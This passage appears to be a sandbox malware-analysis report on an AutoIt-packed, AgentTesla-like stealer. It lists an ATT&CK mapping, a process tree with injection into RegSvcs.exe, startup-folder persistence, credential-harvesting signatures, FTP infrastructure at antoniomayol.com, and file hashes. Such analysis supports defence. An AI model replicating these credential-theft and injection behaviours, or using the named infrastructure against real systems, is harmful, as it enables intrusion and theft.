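Two refinements worth making before deploying this: exclude the store's own application (chrome.exe reading Chrome's Login Data) explicitly rather than relying on the family threshold, and raise the severity when the accessing image is a Windows binary such as RegSvcs.exe that has no business reading any of these paths.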

                    Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EF6596
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EF6A5A
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_005C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_005C6596
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_005C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_005C6A5A
MITRE ATT&CK Matrix

The matrix is listed one tactic per line. The digits in front of a technique are the report's signature-count badges, kept as rendered; techniques without digits are matrix cells the report shows but did not hit.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 221 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 231 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
Credential Access: 2 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 138 System Information Discovery; 651 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph

Behavior Graph ID: 1588800 | Sample: LfZAz7DQzo.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100
Contacted hosts: ip-api.com; ftp.antoniomayol.com; antoniomayol.com
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

Process tree (numbers in brackets are the graph's count badges for the process):

LfZAz7DQzo.exe [4]
    dropped: C:\Users\user\AppData\Local\...\troopwise.exe, PE32
    signatures: Binary is likely a compiled AutoIt script file
    -> troopwise.exe [2]
        dropped: C:\Users\user\AppData\...\troopwise.vbs, data
        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 3 other signatures
        -> RegSvcs.exe [15, 2]
            network: antoniomayol.com 162.241.62.63, ports 21, 48091, 49731, UNIFIEDLAYER-AS-1US, United States; ip-api.com 208.95.112.1, ports 49730, 49732, 80, TUT-ASUS, United States
            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

wscript.exe [1]
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    -> troopwise.exe [1]
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        -> RegSvcs.exe [2]
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Antivirus and ML detection, submitted sample

Source            Detection   Scanner          Label
LfZAz7DQzo.exe    71%         ReversingLabs    Win32.Trojan.AutoitInject
LfZAz7DQzo.exe    62%         Virustotal
LfZAz7DQzo.exe    100%        Joe Sandbox ML

Antivirus and ML detection, dropped files

Source                                              Detection   Scanner          Label
C:\Users\user\AppData\Local\seskin\troopwise.exe    100%        Joe Sandbox ML
C:\Users\user\AppData\Local\seskin\troopwise.exe    71%         ReversingLabs    Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\seskin\troopwise.exe    62%         Virustotal

No Antivirus matches (reported for each of the remaining three scanner tables)
Domains

Name                    IP              Active    Malicious   Antivirus Detection   Reputation
antoniomayol.com        162.241.62.63   true      false                             high
ip-api.com              208.95.112.1    true      false                             high
ftp.antoniomayol.com    unknown         unknown   false                             high

Contacted URLs

Name                                      Malicious   Antivirus Detection   Reputation
http://ip-api.com/line/?fields=hosting    false                             high

URLs found in memory or binary data

Name | Source | Malicious | Antivirus Detection | Reputation
http://antoniomayol.com | RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ftp.antoniomayol.com | RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.241.62.63 | antoniomayol.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588800
Start date and time: 2025-01-11 05:38:34 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LfZAz7DQzo.exe (renamed because original name is a hash value)
Original Sample Name: 1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 54
• Number of non-executed functions: 283
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:39:36 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs
23:39:35 | API Interceptor | 10050776x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Q5QrxfKnFA.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | RHOqJ5BrHW.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | J8V6dFanEo.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | 3FjrbCZgDN.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | ewYjhndHg2.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | uEuTtkxAqq.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | 0I9GLRSiy0.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | NUGMrDcg4v.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | LMxd0gpIxe.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | rComprobante_swift_8676534657698632.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
162.241.62.63 | Order 122001-220 guanzo.exe | malicious | FormBook | www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Q5QrxfKnFA.exe | malicious | AgentTesla | 208.95.112.1
 | RHOqJ5BrHW.exe | malicious | AgentTesla | 208.95.112.1
 | J8V6dFanEo.exe | malicious | AgentTesla | 208.95.112.1
 | 3FjrbCZgDN.exe | malicious | AgentTesla | 208.95.112.1
 | ewYjhndHg2.exe | malicious | AgentTesla | 208.95.112.1
 | uEuTtkxAqq.exe | malicious | AgentTesla | 208.95.112.1
 | 0I9GLRSiy0.exe | malicious | AgentTesla | 208.95.112.1
 | NUGMrDcg4v.exe | malicious | AgentTesla | 208.95.112.1
 | LMxd0gpIxe.exe | malicious | AgentTesla | 208.95.112.1
 | rComprobante_swift_8676534657698632.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNIFIEDLAYER-AS-1US | zdmZjYqz44.exe | malicious | AgentTesla | 108.179.234.136
 | ZeAX5i7cGB.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
 | iNFGd6bDZX.exe | malicious | AgentTesla | 192.254.225.136
 | RHOqJ5BrHW.exe | malicious | AgentTesla | 162.241.62.63
 | ru52XOQ1p7.exe | malicious | AgentTesla | 192.254.186.165
 | 28uMwHvbTD.exe | malicious | AgentTesla | 162.241.62.63
 | https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher | 162.241.149.91
 | https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher | 162.241.149.91
 | Bontrageroutdoors_Project_Update_202557516.pdf | malicious | Unknown | 108.179.241.236
 | e4Iw3lwFJ5.exe | malicious | AgentTesla | 162.241.62.63
TUT-ASUS | Q5QrxfKnFA.exe | malicious | AgentTesla | 208.95.112.1
 | RHOqJ5BrHW.exe | malicious | AgentTesla | 208.95.112.1
 | J8V6dFanEo.exe | malicious | AgentTesla | 208.95.112.1
 | 3FjrbCZgDN.exe | malicious | AgentTesla | 208.95.112.1
 | ewYjhndHg2.exe | malicious | AgentTesla | 208.95.112.1
 | uEuTtkxAqq.exe | malicious | AgentTesla | 208.95.112.1
 | 0I9GLRSiy0.exe | malicious | AgentTesla | 208.95.112.1
 | NUGMrDcg4v.exe | malicious | AgentTesla | 208.95.112.1
 | LMxd0gpIxe.exe | malicious | AgentTesla | 208.95.112.1
 | rComprobante_swift_8676534657698632.exe | malicious | AgentTesla | 208.95.112.1
                                      No context
                                      No context
Process: C:\Users\user\Desktop\LfZAz7DQzo.exe
File Type: data
Category: dropped
Size (bytes): 245248
Entropy (8bit): 6.753866183433448
Encrypted: false
SSDEEP: 6144:teSlS8W3NZpl9tLQWo1H6NNndit5IE3OTKSeLMEKCMyon1bnXQSI:ttlS84NZpl9pQ/1H8G5IE3AKSeLMEKC7
MD5: F185C708CCE65DE39ACC6EFFF18747A7
SHA1: 8E95F656A4E19D3D2555344F033C4E0887EB3C6D
SHA-256: E2C29E2230FC596EE4CF3695962BB8568CF3719D63F8231A1220E946CFB3E86F
SHA-512: FB112ED3E8E1EF76BB6377E305807339440D1DCBBB7767D4EEC238DCA892F77F9140D318D68D985EACE4F32276417CBDDF10FB7E2710DBE2EF79775382A2FB8D
Malicious: false
Reputation: low
                                      Preview:z..4Z9LWCJW4..CH.0QWZFQ9.4ZNHK7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK.DK4W&.YG.^.`.B....?35qI%[=<)&.'*Z7V8w%/wF4[c!\....f<V3QtCEA.DK4Y9LW..W4.4@HA..1ZFQ9W4ZN.K5E@5R9L.DJW<A5CH20..YFQ.W4Z.KK7D.4Y.LWGHW4E5CH20QW^FQ9W4ZNHk3DK6Y9LWGJU4..CH"0QGZFQ9G4Z^HK7DK4I9LWGJW4A5CH>.RW.FQ9W.YN.N7DK4Y9LWGJW4A5CH20QW^F]9W4ZNHK7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK7DK4Y9LWGJW4A5Ch20YWZFQ9W4ZNHK?dK4.9LWGJW4A5CH.D4/.FQ93.YNHk7DK.Z9LUGJW4A5CH20QWZFq9WTt<;9TDK4.<LWG.T4A3CH2.RWZFQ9W4ZNHK7D.4Yyb%"&8WA5OH20QW^FQ;W4Z.KK7DK4Y9LWGJW4.5C.20QWZFQ9W4ZNHK7D..Z9LWGJ.4A5AH70..XF9.V4YNHK6DK2Y9LWGJW4A5CH20QWZFQ9W4ZNHK7DK4Y9LWGJW4A5CH20QWZFL.....u.9u>;>.q.-.7..P.I..U.D., ...:....k"A..4.:s..X...L.<_7I....aYG&I".Cn:"./....{pM...H&.M...'..9An....n....I%g...:..T+&.8I<;"d.U'T1!.2.VZFQ9......."L.caTHTc&9c....eE".....$NHKSDK4+9LW&JW4.5CH]0QW4FQ9)4ZN6K7D.4Y9.WGJ`4A5fH20<WZFu9W4$NHK.9D;..>4.4A5CH...g.+...k.y..r:.'b.o...P.~..7c.X2.&z.s..F../..Nk'Qd..3@3GM07UTV{_r..oJO3AI3]:@jI.....n..h.. ....4.77DK4Y9.WG.W4A..H.0QW.F.9.ZNH..D.4.9...J
Process: C:\Users\user\Desktop\LfZAz7DQzo.exe
File Type: data
Category: dropped
Size (bytes): 160512
Entropy (8bit): 7.924481154071239
Encrypted: false
SSDEEP: 3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
MD5: A8DDD34B5C9942942F7D0177B916D8B3
SHA1: 311652C99FF72A7A453640EE7AA160A9CAF795CD
SHA-256: 440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
SHA-512: 69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
Malicious: false
Reputation: low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..
Process: C:\Users\user\AppData\Local\seskin\troopwise.exe
File Type: data
Category: dropped
Size (bytes): 160512
Entropy (8bit): 7.924481154071239
Encrypted: false
SSDEEP: 3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
MD5: A8DDD34B5C9942942F7D0177B916D8B3
SHA1: 311652C99FF72A7A453640EE7AA160A9CAF795CD
SHA-256: 440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
SHA-512: 69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
Malicious: false
Reputation: low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..
Process: C:\Users\user\AppData\Local\seskin\troopwise.exe
File Type: data
Category: dropped
Size (bytes): 160512
Entropy (8bit): 7.924481154071239
Encrypted: false
SSDEEP: 3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
MD5: A8DDD34B5C9942942F7D0177B916D8B3
SHA1: 311652C99FF72A7A453640EE7AA160A9CAF795CD
SHA-256: 440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
SHA-512: 69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
Malicious: false
Reputation: low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..
Process: C:\Users\user\Desktop\LfZAz7DQzo.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 615936
Entropy (8bit): 7.935089786585949
Encrypted: false
SSDEEP: 12288:0YV6MorX7qzuC3QHO9FQVHPF51jgckYY8bj8LfBmQdGFjZUBdYay3X8F:zBXu9HGaVHjY8n8LeWdzy3c
MD5: 79129CF9382F91AB74A895CD2C5A0C7F
SHA1: E1590B1A5AB3212DD35732AFFFFB68236A2CA8B2
SHA-256: 1E6A8F176A0D7A9BD0321B4C032153F48B244BE1584137453BF1AFC07EA10157
